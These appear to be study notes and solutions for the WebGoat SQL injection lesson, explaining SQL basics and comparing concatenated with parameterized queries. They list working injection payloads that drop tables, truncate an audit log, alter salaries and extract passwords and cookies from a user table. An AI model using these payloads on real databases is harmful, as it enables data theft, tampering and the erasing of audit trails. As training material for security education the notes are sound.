A1: SQL Injection 1
Introduction
I. The SQL language
Data Manipulation Language (DML)
Common data manipulation statements:

```sql
SELECT -- retrieve data from a database
```
Data Definition Language (DDL)
Common data definition statements:
Data Control Language (DCL)
Common data control statements:

```sql
GRANT -- sql allow users access privileges to the database
```
II. SQL injection

1. Normal query

The query is built by concatenating the user-supplied name into the SQL string:

```java
"SELECT * FROM users WHERE name = '" + userName + "'";
```

With the input Smith this becomes:

```sql
SELECT * FROM users WHERE name = 'Smith';
```
2. Simple injection
Here are some examples of what a hacker could supply to the input field to perform actions on the database that go further than just reading the data of a single user:
- Smith' OR '1' = '1 results in SELECT * FROM users WHERE name = 'Smith' OR TRUE; and that way will return all entries from the users table
- Smith' OR 1 = 1; -- results in SELECT * FROM users WHERE name = 'Smith' OR TRUE;--'; and that way will return all entries from the users table
- Smith'; DROP TABLE users; TRUNCATE audit_log; -- chains multiple SQL commands and deletes the USERS table as well as entries from the audit_log
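As an added example (not code from the original page or from WebGoat), the lookup above written twice in Python against an in-memory SQLite table with constructed sample rows: the concatenated version returns every row for the first input listed above, while the parameterized version treats the same input as a literal name and matches nothing. The table name, columns and sample rows are assumptions.

```python
import sqlite3

# Constructed sample data standing in for the lesson's users table (not the real schema).
SAMPLE_USERS = [
    (1, "Smith", "dept-a"),
    (2, "Jones", "dept-b"),
    (3, "Lee", "dept-c"),
]


def open_db():
    """In-memory SQLite database seeded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (userid INTEGER, name TEXT, dept TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_name):
    """String concatenation as on this page: the input becomes part of the SQL text."""
    query = "SELECT userid, name FROM users WHERE name = '" + user_name + "'"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn, user_name):
    """Bound parameter: the driver passes the value separately, so quotes in it stay data."""
    query = "SELECT userid, name FROM users WHERE name = ?"
    return conn.execute(query, (user_name,)).fetchall()


def demo():
    """Run both lookups with a normal name and with the first input from the list above."""
    conn = open_db()
    benign = "Smith"
    hostile = "Smith' OR '1' = '1"
    return {
        "benign_vulnerable": lookup_vulnerable(conn, benign),
        "benign_parameterized": lookup_parameterized(conn, benign),
        "hostile_vulnerable": lookup_vulnerable(conn, hostile),      # every row
        "hostile_parameterized": lookup_parameterized(conn, hostile),  # no row
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label}: {rows}")
```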
1. String SQL injection
2. Numeric SQL injection
3. Compromising confidentiality with string SQL injection
4. Compromising integrity with query chaining
   Employee Name: 1
   Authentication TAN: 1';update employees set salary=87000 where last_name='Smith';--
5. Compromising availability
   Action contains: Smith';drop table access_log;--
Advanced

1. Special characters
```
/* */     inline comments
;         allows query chaining
', +, ||  allow string concatenation
```
2. Special statements

1. Union
The UNION operator is used to combine the results of two or more SELECT statements.
Rules to keep in mind when working with a UNION:
- The number of columns selected in each statement must be the same.
- The data type of the first column in the first SELECT statement must match the data type of the first column in the second (third, fourth, ...) SELECT statement. The same applies to all other columns.
```sql
SELECT first_name FROM user_system_data UNION SELECT login_count FROM user_data;
```

The UNION ALL syntax also allows duplicate values.
2. Joins
The JOIN operator is used to combine rows from two or more tables, based on a related column.
```sql
SELECT * FROM user_data INNER JOIN user_data_tan ON user_data.userid=user_data_tan.userid;
```
Assignment on p3

Solution 1:
Use a UNION: the number of columns and the data type of each column must be the same in both SELECT statements.

Solution 2:
Append a second statement directly with ";":
Name: 1'or 1=1;select userid,user_name,password,cookie from user_system_data;--
Password: 1' or 1=1;--